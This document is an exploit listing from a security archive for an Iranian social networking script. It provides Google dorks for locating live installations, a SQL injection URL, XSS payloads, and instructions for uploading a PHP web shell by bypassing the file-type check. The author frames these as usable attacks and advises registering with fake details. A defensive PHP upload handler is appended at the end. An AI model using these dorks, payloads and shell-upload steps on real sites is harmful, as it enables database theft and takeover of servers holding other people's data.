Iranian Social Network Multiple Exploit

2018.04.12
Credit: GIST (IR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

##########################################################
# Title : Iranian Social Network Multiple Exploit
# Date : 12 April 2018
# Tested on : Ubuntu/Windows 10
# Google Dork : inurl:/register.php intitle:شبکه اجتماعی
# Google Dork2 : inurl:/news2.php?id= intitle:شبکه اجتماعی
# Author : GIST
# Vendor : http://sana-net.com/
# Exploit Type : Remote
# Version : All Version
# CVE : -
###########################################################

Description :
Iranian Social Network has multiple vulnerabilities (SQLi, XSS, File Upload).
We can inject and download the database or upload a shell.
To use these vulnerabilities, you first have to register with fake information.

Sql Injection :
Url : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219'
Request Method : Post

-- response --
HTTP/1.1 200OK
Server nginx/1.4.6 (Ubuntu)
Date: Thu, 10 mar 2016 19:18:47 GMT
Content-Type: text/html
Transfer-Encoding: Chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Expires: Thu, 19 Nov 1981 08:51:00 GMT
Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragme: no-cache
Content-encoing: gzip

Xss :
URL : site.com/search_prof.php?op=3&ostan=1219&vez=1219&sen1=1219&jensu=1219&city=1219&picu=1219&vsalamat=1219
commands :
<script>alert('Xss')</script>
or
"><script>alert('Xss')</script>

File Upload :
URL : /editprofilepic.php
Method : Post
Convert .php to .jpg, choose your shell, and bypass the file to .php with Live HTTP Headers.
Directory Shell : site.com/images/users/shell.php
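
The file-upload issue above depends on the server trusting the client-supplied file name, which can be changed in transit. As an added example (not code from the vendor or the advisory author), a hardened PHP upload handler that decides the type from the file's bytes and assigns its own name; the function name, the `pic` field, the size limit, and PHP 7+ with the GD and fileinfo extensions are assumptions.

```php
<?php
// Added example: hypothetical hardened handler for a profile-picture upload.
// The field name "pic", the size limit and the storage path are assumptions.

const MAX_BYTES = 2 * 1024 * 1024;
// Server-side allowlist: detected MIME type => extension assigned by the server.
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

function store_profile_picture(array $file, string $destDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Decide the type from the bytes, never from $file['name'] or $file['type']:
    // both are client-controlled and can be rewritten between browser and server.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED[$mime])) {
        throw new RuntimeException('not an accepted image type');
    }

    // Re-encode through GD so only pixel data is written to disk.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }

    // Server-generated name and extension; the client's file name is discarded.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $path = rtrim($destDir, '/') . '/' . $name;
    $ok = $mime === 'image/png' ? imagepng($img, $path) : imagejpeg($img, $path, 90);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $name;
}

// Usage inside the request handler (hypothetical field name):
// $stored = store_profile_picture($_FILES['pic'], __DIR__ . '/images/users');
```

The upload directory (images/users/ in the advisory) should additionally be configured so the web server never passes files in it to the PHP interpreter.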


Copyright 2018, cxsecurity.com

 
